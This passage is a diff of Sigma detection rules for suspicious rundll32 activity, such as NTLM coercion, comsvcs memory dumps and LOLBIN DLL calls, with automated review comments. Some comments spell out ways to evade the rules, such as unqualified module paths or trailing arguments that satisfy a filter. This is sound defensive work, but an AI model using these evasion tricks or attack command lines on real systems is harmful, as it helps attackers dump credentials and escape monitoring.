elevation attempt by coercing NTLM authentication - on the Printer Spooler service +description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service references: - https://twitter.com/med0x2e/status/1520402518685200384 - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml 
@@ -22,13 +21,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - C:\windows\system32\davclnt.dll,DavSetCookie - http - CommandLine|contains: + CommandLine|contains: - spoolss - srvsvc - /print/pipe/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml index 6091fdbea..48708b3cf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml @@ -17,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: + CommandLine|contains: - '#+' - '#-' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml index cad600c83..74c668ef2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml 
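Review bot: selection_cli requires the fully qualified string `C:\windows\system32\davclnt.dll,DavSetCookie`, but rundll32 accepts an unqualified module name and resolves it through the normal DLL search order, so `rundll32 davclnt.dll,DavSetCookie http://...` (or the same call with a different drive letter or a `SysWOW64` path) is not detected while the coercion still happens. The remaining conditions (`http` plus one of `spoolss`/`srvsvc`/`/print/pipe/`) already carry the intent of the rule, so the path prefix adds little precision. I would relax the first term to `- davclnt.dll,DavSetCookie` inside the existing `CommandLine|contains|all` list and keep the rest of the hunk unchanged; if this copy is generated from the upstream Sigma rule the change should be made upstream.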
@@ -1,9 +1,7 @@ title: Rundll32 Spawned Via Explorer.EXE id: 1723e720-616d-4ddc-ab02-f7e3685a4713 status: experimental -description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. - This has been observed by variants of Raspberry Robin, as first reported by Red - Canary. +description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. references: - https://redcanary.com/blog/raspberry-robin/ - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -23,11 +21,11 @@ detection: selection_parent: ParentImage|endswith: \explorer.exe selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_generic: - - CommandLine|contains: ' C:\Windows\System32\' - - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' + - CommandLine|contains: ' C:\Windows\System32\' # The space at the start is required + - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml index 430b47ed5..f5c2f339e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml 
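Review bot: filter_main_generic suppresses the alert on `CommandLine|contains: ' C:\Windows\System32\'`, a substring test that is satisfied anywhere in the command line, so an attacker-controlled trailing argument such as `rundll32 C:\Users\x\evil.dll,Run C:\Windows\System32\` silences the detection. The comment added in this hunk explains that the leading space is required but not that the exclusion is only a best-effort heuristic; I would at least note it as `# Best-effort: a trailing ' C:\Windows\System32\' argument also satisfies this filter`. A tighter exclusion would anchor the check to the first argument after the image path (for example with a `CommandLine|re` pattern), which I would validate against the Windows 10 volume-control case covered by the second filter entry before changing behaviour. If this rule is generated from upstream Sigma, the tightening belongs there.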
@@ -1,11 +1,10 @@ title: Process Memory Dump Via Comsvcs.DLL id: 646ea171-dded-4578-8a4d-65e9822892e3 related: - - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c - type: obsoletes + - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c + type: obsoletes status: test -description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering - multiple different techniques (ordinal, minidump function, etc.) +description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) references: - https://twitter.com/shantanukhande/status/1229348874298388484 - https://twitter.com/pythonresponder/status/1385064506049630211?s=21 @@ -32,25 +31,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - comsvcs - full - CommandLine|contains: + CommandLine|contains: - '#-' - '#+' - '#24' - '24 ' - - MiniDump + - MiniDump # Matches MiniDump and MinidumpW selection_generic: - CommandLine|contains|all: + CommandLine|contains|all: - '24' - comsvcs - full - CommandLine|contains: + CommandLine|contains: - ' #' - ',#' - ', #' diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml index cb494d5f5..e7e69995e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml 
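Review bot: The new comment `# Matches MiniDump and MinidumpW` on the `- MiniDump` entry of selection_cli_1 is only true because Sigma string modifiers such as `contains` compare case-insensitively; a reader who assumes a literal substring match would conclude that `MinidumpW` (lower-case d) is not covered. Suggest making the reason explicit, e.g. `- MiniDump # Matches MiniDump and MinidumpW (contains is case-insensitive)`. The `'24 '` and `'#24'` entries in the same list are left without a comment explaining that 24 is the export ordinal of MiniDump in comsvcs.dll, which the second hunk's `- '24'` in selection_generic relies on as well; a one-line comment there would make the two selections easier to keep in sync.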
@@ -21,13 +21,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - '-sta ' - '-localserver ' - CommandLine|contains|all: + CommandLine|contains|all: - '{' - '}' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml index 96a19f2c9..a429dbf3d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml @@ -20,21 +20,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|contains: - - :\RECYCLER\ - - :\SystemVolumeInformation\ - - Image|startswith: - - C:\Windows\Tasks\ - - C:\Windows\debug\ - - C:\Windows\fonts\ - - C:\Windows\help\ - - C:\Windows\drivers\ - - C:\Windows\addins\ - - C:\Windows\cursors\ - - C:\Windows\system32\tasks\ + - Image|contains: + - :\RECYCLER\ + - :\SystemVolumeInformation\ + - Image|startswith: + - C:\Windows\Tasks\ + - C:\Windows\debug\ + - C:\Windows\fonts\ + - C:\Windows\help\ + - C:\Windows\drivers\ + - C:\Windows\addins\ + - C:\Windows\cursors\ + - C:\Windows\system32\tasks\ condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml index 2558dfa21..1f5d94d4d 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml @@ -20,18 +20,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: rundll32 + CommandLine|contains: rundll32 selection2: - CommandLine|contains: + CommandLine|contains: - mshtml,RunHTMLApplication - mshtml,#135 selection3: - CommandLine|contains: + CommandLine|contains: - 'javascript:' - 'vbscript:' condition: process_creation and (all of selection*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml index fab3fcabc..aab7577ef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml 
@@ -1,12 +1,7 @@ title: Suspicious Rundll32 Setupapi.dll Activity id: 285b85b1-a555-4095-8652-a8a4106af63f status: test -description: setupapi.dll library provide InstallHinfSection function for processing - INF files. INF file may contain instructions allowing to create values in the - registry, modify files and install drivers. This technique could be used to obtain - persistence via modifying one of Run or RunOnce registry keys, run process or - use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll - calls runonce.exe executable regardless of actual content of INF file. +description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. references: - https://lolbas-project.github.io/lolbas/Libraries/Setupapi/ - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf @@ -39,7 +34,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Scripts and administrative tools that use INF files for driver installation - with setupapi.dll + - Scripts and administrative tools that use INF files for driver installation with setupapi.dll level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml index 21faba436..9f9d774bc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml @@ -20,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shell32.dll - Control_RunDLL - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%LocalAppData%' - '%Temp%' diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml index e86d0ef34..a8c774085 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml @@ -1,8 +1,7 @@ title: Potential ShellDispatch.DLL Functionality Abuse id: 82343930-652f-43f5-ab70-2ee9fdd6d5e9 status: experimental -description: Detects potential "ShellDispatch.dll" functionality abuse to execute - arbitrary binaries via "ShellExecute" +description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" references: - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ author: X__Junior (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: RunDll_ShellExecuteW + CommandLine|contains: RunDll_ShellExecuteW condition: process_creation and (all of selection_*) falsepositives: - Unlikely 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml index 4798771d6..569a1fb35 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml @@ -1,8 +1,7 @@ title: RunDLL32 Spawning Explorer id: caa06de8-fdef-4c91-826a-7f9e163eef4b status: test -description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, - often observes Gamarue spawning the explorer.exe process in an unusual way +description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way references: - https://redcanary.com/blog/intelligence-insights-november-2021/ author: elhoim, CD_ROM_ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml index 9f78e384a..b64beae81 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml 
@@ -1,17 +1,15 @@ title: Potentially Suspicious Rundll32 Activity id: e593cf51-88db-4ee1-b920-37e89012a3c9 status: test -description: Detects suspicious execution of rundll32, with specific calls to some - DLLs with known LOLBIN functionalities +description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities references: - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ - https://twitter.com/Hexacorn/status/885258886428725250 - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52 - - https://twitter.com/nas_bench/status/1433344116071583746 - - https://twitter.com/eral4m/status/1479106975967240209 - - https://twitter.com/eral4m/status/1479080793003671557 -author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron - Systems) + - https://twitter.com/nas_bench/status/1433344116071583746 # dfshim.dll,ShOpenVerbShortcut + - https://twitter.com/eral4m/status/1479106975967240209 # scrobj.dll,GenerateTypeLib + - https://twitter.com/eral4m/status/1479080793003671557 # shimgvw.dll,ImageView_Fullscreen +author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/05/17 tags: 
@@ -26,91 +24,89 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains|all: - - 'javascript:' - - .RegisterXLL - - CommandLine|contains|all: - - url.dll - - OpenURL - - CommandLine|contains|all: - - url.dll - - OpenURLA - - CommandLine|contains|all: - - url.dll - - FileProtocolHandler - - CommandLine|contains|all: - - zipfldr.dll - - RouteTheCall - - CommandLine|contains|all: - - shell32.dll - - Control_RunDLL - - CommandLine|contains|all: - - shell32.dll - - ShellExec_RunDLL - - CommandLine|contains|all: - - mshtml.dll - - PrintHTML - - CommandLine|contains|all: - - advpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - advpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieadvpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - ieadvpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieframe.dll - - OpenURL - - CommandLine|contains|all: - - shdocvw.dll - - OpenURL - - CommandLine|contains|all: - - syssetup.dll - - SetupInfObjectInstallAction - - CommandLine|contains|all: - - setupapi.dll - - InstallHinfSection - - CommandLine|contains|all: - - pcwutl.dll - - LaunchApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbShortcut - - CommandLine|contains|all: - - scrobj.dll - - GenerateTypeLib - - http - - CommandLine|contains|all: - - shimgvw.dll - - ImageView_Fullscreen - - http - - CommandLine|contains|all: - - comsvcs.dll - - MiniDump + - CommandLine|contains|all: + - 'javascript:' + - .RegisterXLL + - CommandLine|contains|all: + - url.dll + - OpenURL + - CommandLine|contains|all: + - url.dll + - OpenURLA + - CommandLine|contains|all: + - url.dll + - FileProtocolHandler + - CommandLine|contains|all: + - zipfldr.dll + - RouteTheCall + - CommandLine|contains|all: + - shell32.dll + - Control_RunDLL + - CommandLine|contains|all: + - shell32.dll + - ShellExec_RunDLL + - 
CommandLine|contains|all: + - mshtml.dll + - PrintHTML + - CommandLine|contains|all: + - advpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - advpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieadvpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - ieadvpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieframe.dll + - OpenURL + - CommandLine|contains|all: + - shdocvw.dll + - OpenURL + - CommandLine|contains|all: + - syssetup.dll + - SetupInfObjectInstallAction + - CommandLine|contains|all: + - setupapi.dll + - InstallHinfSection + - CommandLine|contains|all: + - pcwutl.dll + - LaunchApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbShortcut + - CommandLine|contains|all: + - scrobj.dll + - GenerateTypeLib + - http + - CommandLine|contains|all: + - shimgvw.dll + - ImageView_Fullscreen + - http + - CommandLine|contains|all: + - comsvcs.dll + - MiniDump filter_main_screensaver: - CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver - filter_main_parent_cpl: + CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver + filter_main_parent_cpl: # Settings ParentImage: C:\Windows\System32\control.exe ParentCommandLine|contains: .cpl - CommandLine|contains|all: + CommandLine|contains|all: - Shell32.dll - Control_RunDLL - .cpl filter_main_startmenu: ParentImage: C:\Windows\System32\control.exe - CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL - "C:\Windows\System32\' - CommandLine|endswith: .cpl", + CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\' + CommandLine|endswith: .cpl", condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend 
on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml index 3753e12c0..13fd019a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml @@ -1,8 +1,7 @@ title: Suspicious Control Panel DLL Load id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 status: test -description: Detects suspicious Rundll32 execution from control.exe as used by Equation - Group and Exploit Kits +description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits references: - https://twitter.com/rikvduijn/status/853251879320662017 - https://twitter.com/felixw3000/status/853354851128025088 @@ -23,10 +22,10 @@ detection: selection_parent: ParentImage|endswith: \System32\control.exe selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter: - CommandLine|contains: Shell32.dll + CommandLine|contains: Shell32.dll condition: process_creation and (all of selection_* and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml index 8dbc82000..8da1777a1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml 
@@ -1,11 +1,10 @@ title: Suspicious Rundll32 Execution With Image Extension id: 4aa6040b-3f28-44e3-a769-9208e5feb5ec related: - - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e - type: similar + - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e + type: similar status: experimental -description: Detects the execution of Rundll32.exe with DLL files masquerading as - image files +description: Detects the execution of Rundll32.exe with DLL files masquerading as image files references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Hieu Tran @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.exe + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .bmp - .cr2 - .eps diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml index e8d8ca234..c72444667 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml 
@@ -1,11 +1,10 @@ title: Suspicious Usage Of ShellExec_RunDLL id: d87bd452-6da1-456e-8155-7dc988157b7d related: - - id: 36c5146c-d127-4f85-8e21-01bf62355d5a - type: obsoletes + - id: 36c5146c-d127-4f85-8e21-01bf62355d5a + type: obsoletes status: test -description: Detects suspicious usage of the ShellExec_RunDLL function to launch other - commands as seen in the the raspberry-robin attack +description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack references: - https://redcanary.com/blog/raspberry-robin/ - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -24,9 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_openasrundll: - CommandLine|contains: ShellExec_RunDLL + CommandLine|contains: ShellExec_RunDLL selection_suspcli: - CommandLine|contains: + CommandLine|contains: + # Add more LOLBINs and Susp Paths - regsvr32 - msiexec - \Users\Public\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml index 90faa2e9a..86d1a8967 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml 
@@ -18,23 +18,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - apphelp.dll selection1b: - CommandLine|contains: + CommandLine|contains: - ShimFlushCache - '#250' selection2a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - kernel32.dll selection2b: - CommandLine|contains: + CommandLine|contains: - BaseFlushAppcompatCache - '#46' - condition: process_creation and (( selection1a and selection1b ) or ( selection2a - and selection2b )) + condition: process_creation and (( selection1a and selection1b ) or ( selection2a and selection2b )) fields: - Image - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml index d3fa9dbc8..cf658c119 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Activity Invoking Sys File id: 731231b9-0b5d-4219-94dd-abb6959aa7ea status: test -description: Detects suspicious process related to rundll32 based on command line - that includes a *.sys file as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) @@ -20,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: rundll32.exe + CommandLine|contains: rundll32.exe selection2: - CommandLine|contains: + CommandLine|contains: - .sys, - '.sys ' condition: process_creation and (all of selection*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml index cbdd8c817..6c5bde1da 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml @@ -1,8 +1,7 @@ title: Rundll32 UNC Path Execution id: 5cdb711b-5740-4fb2-ba88-f7945027afac status: test -description: Detects rundll32 execution where the DLL is located on a remote location - (share) +description: Detects rundll32 execution where the DLL is located on a remote location (share) references: - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code author: Nasreddine Bencherchali (Nextron Systems) @@ -21,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml index 311d3355c..cfc0ab4c0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml 
@@ -1,8 +1,7 @@ title: Rundll32 Execution With Uncommon DLL Extension id: c3a99af4-35a9-4668-879e-c09aeb4f2bdf status: experimental -description: Detects the execution of rundll32 with a command line that doesn't contain - a common extension +description: Detects the execution of rundll32 with a command line that doesn't contain a common extension references: - https://twitter.com/mrd0x/status/1481630810495139841?s=12 author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou @@ -20,21 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_known_extension: - CommandLine|contains: + CommandLine|contains: - .cpl - .dll - '.inf' filter_main_localserver: - CommandLine|contains: ' -localserver ' + CommandLine|contains: ' -localserver ' filter_main_zzzzInvokeManagedCustomActionOutOfProc: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Windows\Installer\MSI - .tmp - zzzzInvokeManagedCustomActionOutOfProc diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml index c1743f885..661b27c36 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml @@ -1,8 +1,7 @@ title: Suspicious Workstation Locking via Rundll32 id: 3b5b0213-0460-4e3f-8937-3abf98ff7dcc status: test -description: Detects a suspicious call to the user32.dll function that locks the user - workstation +description: Detects a suspicious call to the user32.dll function that locks the user workstation references: - https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/ author: frack113 
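Review bot: In the `@@ -20,21 +19,21 @@` hunk of proc_creation_win_rundll32_uncommon_dll_extension.yml the explicit `CommandLine: null` under filter_main_null becomes a bare `CommandLine:` with no value. YAML parses an empty scalar as null, so the filter should still match events that carry no CommandLine field, but the bare key is easy to mistake for an unfinished entry and no longer states the intent. Suggest keeping the literal, `CommandLine: null`, or adding a trailing comment such as `CommandLine: # null: event has no CommandLine field`, so the filter reads the same way as the neighbouring filter_main_empty (`CommandLine: ''`).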
